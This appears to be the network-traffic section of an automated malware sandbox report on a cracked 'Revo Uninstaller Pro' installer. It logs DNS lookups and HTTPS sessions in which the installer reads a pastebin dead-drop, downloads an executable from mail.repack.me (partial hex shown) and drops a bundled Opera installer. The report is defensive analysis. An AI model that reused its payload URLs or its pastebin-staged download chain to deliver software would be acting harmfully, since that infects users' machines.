                                                                                                                                            Dec 9, 2024 17:40:08.618938923 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:08.619004965 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:08.619350910 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:08.619363070 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.578104019 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.578174114 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:09.581651926 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:09.581665039 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.581893921 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.582041979 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:09.582346916 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:09.627329111 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.787844896 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.789637089 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:09.793682098 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:09.793690920 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.793813944 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:09.793819904 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.867208004 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.867291927 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:09.927707911 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:09.927731991 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.928096056 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:09.928160906 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:09.928594112 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:09.971326113 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.012649059 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.012672901 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.012731075 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.012756109 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:10.012756109 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:10.012789011 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:10.030272007 CET49718443192.168.2.9107.167.110.216
                                                                                                                                            Dec 9, 2024 17:40:10.030308008 CET44349718107.167.110.216192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.247356892 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.247422934 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.247437000 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.247616053 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.247617006 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.247648001 CET44349717107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.247661114 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.247704983 CET49717443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.248725891 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.248764038 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.248925924 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.249166965 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:10.249176979 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.314476967 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.314547062 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:10.314610004 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:10.317531109 CET49719443192.168.2.9107.167.96.36
                                                                                                                                            Dec 9, 2024 17:40:10.317562103 CET44349719107.167.96.36192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:11.810245991 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:11.814608097 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:11.814608097 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:11.814634085 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:11.818069935 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:11.818088055 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292654037 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292735100 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292756081 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292795897 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292800903 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292824030 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292836905 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292860985 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292967081 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.292982101 CET44349720107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.292990923 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.293034077 CET49720443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.293987989 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.294013977 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:12.294070959 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.294337034 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:12.294347048 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:13.946839094 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:13.946953058 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:13.947527885 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:13.947540998 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:13.947698116 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:13.947704077 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418596029 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418685913 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418701887 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418740034 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418762922 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418804884 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418807983 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418826103 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418832064 CET44349722107.167.125.189192.168.2.9
                                                                                                                                            Dec 9, 2024 17:40:14.418852091 CET49722443192.168.2.9107.167.125.189
                                                                                                                                            Dec 9, 2024 17:40:14.418894053 CET49722443192.168.2.9107.167.125.189
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 9, 2024 17:39:31.457123995 CET | 55670 | 53 | 192.168.2.9 | 1.1.1.1
Dec 9, 2024 17:39:31.596836090 CET | 53 | 55670 | 1.1.1.1 | 192.168.2.9
Dec 9, 2024 17:39:33.958148956 CET | 59667 | 53 | 192.168.2.9 | 1.1.1.1
Dec 9, 2024 17:39:34.196868896 CET | 53 | 59667 | 1.1.1.1 | 192.168.2.9
Dec 9, 2024 17:39:55.921753883 CET | 60236 | 53 | 192.168.2.9 | 1.1.1.1
Dec 9, 2024 17:39:56.586894035 CET | 53 | 60236 | 1.1.1.1 | 192.168.2.9
Dec 9, 2024 17:40:05.065732002 CET | 61183 | 53 | 192.168.2.9 | 1.1.1.1
Dec 9, 2024 17:40:05.066545010 CET | 50770 | 53 | 192.168.2.9 | 1.1.1.1
Dec 9, 2024 17:40:05.067073107 CET | 49587 | 53 | 192.168.2.9 | 1.1.1.1
Dec 9, 2024 17:40:05.206352949 CET | 53 | 50770 | 1.1.1.1 | 192.168.2.9
Dec 9, 2024 17:40:05.207856894 CET | 53 | 61183 | 1.1.1.1 | 192.168.2.9
Dec 9, 2024 17:40:05.843278885 CET | 53 | 49587 | 1.1.1.1 | 192.168.2.9
Dec 9, 2024 17:40:07.815080881 CET | 51551 | 53 | 192.168.2.9 | 1.1.1.1
Dec 9, 2024 17:40:08.109826088 CET | 53029 | 53 | 192.168.2.9 | 1.1.1.1
Dec 9, 2024 17:40:08.352540016 CET | 53 | 51551 | 1.1.1.1 | 192.168.2.9
Dec 9, 2024 17:40:08.617971897 CET | 53 | 53029 | 1.1.1.1 | 192.168.2.9
Dec 9, 2024 17:40:10.326318026 CET | 57910 | 53 | 192.168.2.9 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 9, 2024 17:39:31.457123995 CET | 192.168.2.9 | 1.1.1.1 | 0xd17 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:39:33.958148956 CET | 192.168.2.9 | 1.1.1.1 | 0x40f9 | Standard query (0) | mail.repack.me | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:39:55.921753883 CET | 192.168.2.9 | 1.1.1.1 | 0xeab9 | Standard query (0) | net.geo.opera.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:05.065732002 CET | 192.168.2.9 | 1.1.1.1 | 0x9c41 | Standard query (0) | autoupdate.opera.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:05.066545010 CET | 192.168.2.9 | 1.1.1.1 | 0xad0e | Standard query (0) | autoupdate.geo.opera.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:05.067073107 CET | 192.168.2.9 | 1.1.1.1 | 0xa643 | Standard query (0) | desktop-netinstaller-sub.osp.opera.software | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:07.815080881 CET | 192.168.2.9 | 1.1.1.1 | 0x2bca | Standard query (0) | features.opera-api2.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:08.109826088 CET | 192.168.2.9 | 1.1.1.1 | 0x3ada | Standard query (0) | download.opera.com | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:10.326318026 CET | 192.168.2.9 | 1.1.1.1 | 0xf865 | Standard query (0) | download3.operacdn.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 9, 2024 17:39:31.596836090 CET | 1.1.1.1 | 192.168.2.9 | 0xd17 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:39:31.596836090 CET | 1.1.1.1 | 192.168.2.9 | 0xd17 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:39:31.596836090 CET | 1.1.1.1 | 192.168.2.9 | 0xd17 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:39:34.196868896 CET | 1.1.1.1 | 192.168.2.9 | 0x40f9 | No error (0) | mail.repack.me | | 194.87.189.43 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:39:56.586894035 CET | 1.1.1.1 | 192.168.2.9 | 0xeab9 | No error (0) | net.geo.opera.com | na.net.opera.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 17:39:56.586894035 CET | 1.1.1.1 | 192.168.2.9 | 0xeab9 | No error (0) | na.net.opera.com | trn.lb.opera.technology | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 17:39:56.586894035 CET | 1.1.1.1 | 192.168.2.9 | 0xeab9 | No error (0) | trn.lb.opera.technology | | 107.167.96.30 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:39:56.586894035 CET | 1.1.1.1 | 192.168.2.9 | 0xeab9 | No error (0) | trn.lb.opera.technology | | 107.167.96.31 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:05.206352949 CET | 1.1.1.1 | 192.168.2.9 | 0xad0e | No error (0) | autoupdate.geo.opera.com | na-autoupdate.opera.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 17:40:05.206352949 CET | 1.1.1.1 | 192.168.2.9 | 0xad0e | No error (0) | na-autoupdate.opera.com | | 107.167.96.39 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:05.206352949 CET | 1.1.1.1 | 192.168.2.9 | 0xad0e | No error (0) | na-autoupdate.opera.com | | 107.167.96.38 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:05.207856894 CET | 1.1.1.1 | 192.168.2.9 | 0x9c41 | No error (0) | autoupdate.opera.com | autoupdate.geo.opera.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 17:40:05.207856894 CET | 1.1.1.1 | 192.168.2.9 | 0x9c41 | No error (0) | autoupdate.geo.opera.com | na-autoupdate.opera.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 9, 2024 17:40:05.207856894 CET | 1.1.1.1 | 192.168.2.9 | 0x9c41 | No error (0) | na-autoupdate.opera.com | | 107.167.96.38 | A (IP address) | IN (0x0001) | false
Dec 9, 2024 17:40:05.207856894 CET | 1.1.1.1 | 192.168.2.9 | 0x9c41 | No error (0) | na-autoupdate.opera.com | | 107.167.96.39 | A (IP address) | IN (0x0001) | false
                                                                                                                                            Dec 9, 2024 17:40:05.843278885 CET1.1.1.1192.168.2.90xa643No error (0)desktop-netinstaller-sub.osp.opera.softwaresubmit-target.osp.opera.softwareCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.843278885 CET1.1.1.1192.168.2.90xa643No error (0)submit-target.osp.opera.softwaresubmit.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.843278885 CET1.1.1.1192.168.2.90xa643No error (0)submit.geo.opera.comsubmit-trn.osp.opera.softwareCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:05.843278885 CET1.1.1.1192.168.2.90xa643No error (0)submit-trn.osp.opera.software107.167.125.189A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)features.opera-api2.comfeatures-2.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)features-2.geo.opera.comus-features.opera-api2.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)us-features.opera-api2.comlati.lb.opera.technologyCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)lati.lb.opera.technology107.167.110.216A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.352540016 CET1.1.1.1192.168.2.90x2bcaNo error (0)lati.lb.opera.technology107.167.110.211A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.617971897 CET1.1.1.1192.168.2.90x3adaNo error (0)download.opera.comdownload.geo.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.617971897 CET1.1.1.1192.168.2.90x3adaNo error (0)download.geo.opera.comna-download.opera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.617971897 CET1.1.1.1192.168.2.90x3adaNo error (0)na-download.opera.com107.167.96.36A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:08.617971897 CET1.1.1.1192.168.2.90x3adaNo error (0)na-download.opera.com107.167.96.37A (IP address)IN (0x0001)false
                                                                                                                                            Dec 9, 2024 17:40:10.551424026 CET1.1.1.1192.168.2.90xf865No error (0)download3.operacdn.comv2.download3.operacdn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49709 | 104.20.4.235 | 443 | 7668 | C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:39:33 UTC | 133 | OUT | GET /raw/vkwZzU9B HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: pastebin.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-09 16:39:33 UTC | 391 | IN | HTTP/1.1 200 OK
Date: Mon, 09 Dec 2024 16:39:33 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 09 Dec 2024 16:39:33 GMT
Server: cloudflare
CF-RAY: 8ef66e915a3a8c7b-EWR
2024-12-09 16:39:33 UTC | 41 | IN | Data Raw: 32 33 0d 0a 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 72 65 70 61 63 6b 2e 6d 65 2f 74 73 6a 74 6d 66 64 6d 2e 70 6b 67 0d 0a
Data Ascii: 23https://mail.repack.me/tsjtmfdm.pkg
2024-12-09 16:39:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49710 | 194.87.189.43 | 443 | 7668 | C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:39:35 UTC | 135 | OUT | GET /tsjtmfdm.pkg HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mail.repack.me
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-09 16:39:36 UTC | 283 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.2
Date: Mon, 09 Dec 2024 16:39:36 GMT
Content-Type: application/octet-stream
Content-Length: 419886
Last-Modified: Mon, 28 Oct 2024 17:07:02 GMT
Connection: close
ETag: "671fc4b6-6682e"
Alt-Svc: h3=":443"; ma=86400
Accept-Ranges: bytes
                                                                                                                                            2024-12-09 16:39:36 UTC16101INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 62 60 f7 f7 26 01 99 a4 26 01 99 a4 26 01 99 a4 92 9d 68 a4 2b 01 99 a4 92 9d 6a a4 ab 01 99 a4 92 9d 6b a4 3e 01 99 a4 b8 a1 5e a4 24 01 99 a4 1d 5f 9a a5 30 01 99 a4 1d 5f 9d a5 35 01 99 a4 1d 5f 9c a5 0a 01 99 a4 2f 79 1a a4 2c 01 99 a4 2f 79 0a a4 23 01 99 a4 26 01 98 a4 2c 00 99 a4 b1 5f 9c a5 17 01 99 a4 b1 5f 99 a5 27 01 99 a4 b4 5f 66 a4 27 01 99 a4 b1 5f 9b a5 27 01 99
                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b`&&&h+jk>^$_0_5_/y,/y#&,__'_f'_'


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49713 | 107.167.96.30 | 443 | 5320 | C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-09 16:39:57 UTC | 196 | OUT | GET /opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: net.geo.opera.com
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-09 16:39:58 UTC | 322 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 16:39:58 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: close
Content-Disposition: attachment; filename=OperaSetup.exe
ETag: "43d37a6e0fe6e9824dfd80221e6aad13"
Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                            2024-12-09 16:39:58 UTC16062INData Raw: 34 64 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4e 0c c9 d7 0a 6d a7 84 0a 6d a7 84 0a 6d a7 84 41 15 a4 85 07 6d a7 84 41 15 a2 85 ba 6d a7 84 c8 ec a2 85 5f 6d a7 84 c8 ec a3 85 1e 6d a7 84 c8 ec a4 85 1d 6d a7 84 41 15 a3 85 1c 6d a7 84 41 15 a6 85 03 6d a7 84 0a 6d a6 84 c1 6d a7 84 f9 ef af 85 5c 6d a7 84 f9 ef 58 84 0b 6d a7 84 0a 6d 30 84 0b 6d a7 84 f9 ef a5 85 0b 6d a7 84 52 69 63 68 0a 6d a7 84 00 00
                                                                                                                                            Data Ascii: 4d7MZ@!L!This program cannot be run in DOS mode.$NmmmAmAm_mmmAmAmmm\mXmm0mmRichm
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: ae da ff ff 8d 4e 34 e8 a6 da ff ff 8d 4e 38 e8 9e da ff ff 8d 4e 3c e8 f6 ee ff ff 8d 4e 44 e8 92 ff ff ff 8b c6 5e c3 56 8b f1 83 26 00 8d 4e 08 e8 67 0a 00 00 83 66 04 00 8d 4e 0c e8 fd fe ff ff 8d 4e 24 e8 53 0a 00 00 8d 4e 28 e8 4b 0a 00 00 8d 4e 2c e8 43 0a 00 00 8d 4e 30 e8 3b 0a 00 00 8d 4e 34 e8 33 0a 00 00 8d 4e 38 e8 2b 0a 00 00 8d 4e 3c 5e e9 20 b2 ff ff 8b d1 e8 5c 9e ff ff 8d 4a 0c e8 54 9e ff ff 8b c2 c3 56 8b f1 e8 93 ff ff ff 8d 8e e8 00 00 00 e8 fb b1 ff ff 8d 8e f0 00 00 00 e8 f2 09 00 00 8d 4e 58 e8 26 9e ff ff 8d 4e 64 e8 84 fe ff ff 8d 4e 7c e8 7c fe ff ff 8d 8e 94 00 00 00 e8 71 fe ff ff 8d 8e ac 00 00 00 e8 66 fe ff ff 8d 8e c4 00 00 00 e8 5b fe ff ff 8d 8e dc 00 00 00 5e e9 e9 9d ff ff 33 c0 89 41 08 89 41 0c 89 41 10 89 41 14 89
                                                                                                                                            Data Ascii: N4N8N<ND^V&NgfNN$SN(KN,CN0;N43N8+N<^ \JTVNX&NdN||qf[^3AAAA
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 0a 9d ff ff 8d 4e 68 e8 32 07 00 00 8d 4e 10 33 ff e8 e1 5c ff ff 85 c0 74 15 8d 4e 68 e8 49 07 00 00 8d 4e 10 47 e8 cc 5c ff ff 3b f8 72 eb 5f 5e 33 c0 5b 5d c2 04 00 55 8b ec 53 56 57 8b 7d 08 8b d9 0f b6 47 09 8d 4b 44 50 e8 77 07 00 00 0f b6 47 08 8d 4b 50 50 e8 6a 07 00 00 8d 4b 74 e8 a7 06 00 00 8b 4f 0c 8b f0 57 89 4e 20 8d 4e 18 e8 fa bc ff ff 8d 4f 04 51 8d 4e 1c e8 ee bc ff ff 8a 43 5c 5f 88 46 68 5e 5b 5d c2 04 00 55 8b ec ff 75 08 83 c1 74 e8 d0 5d ff ff 83 c0 18 5d c2 04 00 56 57 8d 79 68 33 f6 8b cf e8 d4 5d ff ff 85 c0 74 1f 56 8b cf e8 af 5d ff ff 8b c8 e8 c0 25 00 00 85 c0 75 0e 8b cf 46 e8 b5 5d ff ff 3b f0 72 e1 33 c0 5f 5e c3 55 8b ec 80 7d 08 00 56 8b f1 57 8b 7e 28 75 69 53 57 8d 4e 74 e8 79 5d ff ff 83 78 20 01 75 58 8d 46 44 57 8b
                                                                                                                                            Data Ascii: Nh2N3\tNhING\;r_^3[]USVW}GKDPwGKPPjKtOWN NOQNC\_Fh^[]Uut]]VWyh3]tV]%uF];r3_^U}VW~(uiSWNty]x uXFDW
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 5f 5e 5d c2 0c 00 55 8b ec 8b 4d 08 8b 41 28 83 e8 01 89 41 28 75 08 51 e8 06 00 00 00 33 c0 5d c2 04 00 56 8b f1 e8 9c 00 00 00 6a 78 56 e8 a2 c1 00 00 59 59 8b c6 5e c2 04 00 56 8b f1 8d 4e 28 e8 7c 5a ff ff 33 c9 c7 06 28 3b 44 00 b8 00 00 10 00 89 4e 2c 89 46 40 89 46 44 33 c0 40 89 4e 30 89 4e 34 89 4e 3c 89 4e 54 8d 4e 58 c7 46 04 14 3b 44 00 c7 46 08 00 3b 44 00 c7 46 0c ec 3a 44 00 c7 46 10 d4 3a 44 00 c7 46 14 bc 3a 44 00 c7 46 18 a8 3a 44 00 c7 46 1c 94 3a 44 00 c7 46 20 80 3a 44 00 c7 46 24 6c 3a 44 00 c6 46 38 ff 89 46 48 89 46 4c c7 46 50 00 00 00 40 e8 ff 59 ff ff 8b c6 5e c3 55 8b ec 6a ff 68 8c 9b 43 00 64 a1 00 00 00 00 50 56 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 4e 2c c7 06 28 3b 44 00 c7 46 04 14 3b 44 00 c7 46 08
                                                                                                                                            Data Ascii: _^]UMA(A(uQ3]VjxVYY^VN(|Z3(;DN,F@FD3@N0N4N<NTNXF;DF;DF:DF:DF:DF:DF:DF :DF$l:DF8FHFLFP@Y^UjhCdPV@D3PEdN,(;DF;DF
                                                                                                                                            2024-12-09 16:39:58 UTC16384INData Raw: 43 00 e8 8b 06 02 00 8b f9 89 7d f0 8b 75 08 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8a 46 03 88 47 03 8b 46 04 89 47 04 8b 46 08 89 47 08 8b 46 0c 89 47 0c 8b 46 10 8b 4e 14 89 47 10 8d 46 18 89 4f 14 8d 4f 18 50 e8 ba e6 fe ff 83 65 fc 00 8d 46 24 50 8d 4f 24 e8 aa e6 fe ff 8b c7 e8 09 06 02 00 c2 04 00 55 8b ec 6a ff 68 74 9c 43 00 64 a1 00 00 00 00 50 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 ff 75 0c 68 70 34 44 00 8b 01 51 ff 10 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c2 08 00 cc cc cc cc cc 55 8b ec 6a ff 68 74 9c 43 00 64 a1 00 00 00 00 50 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 ff 75 0c 68 a0 33 44 00 8b 01 51 ff 10 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c2 08 00 cc cc cc cc cc 83 6c 24 04 04 e9 9d e0 ff ff 83 6c
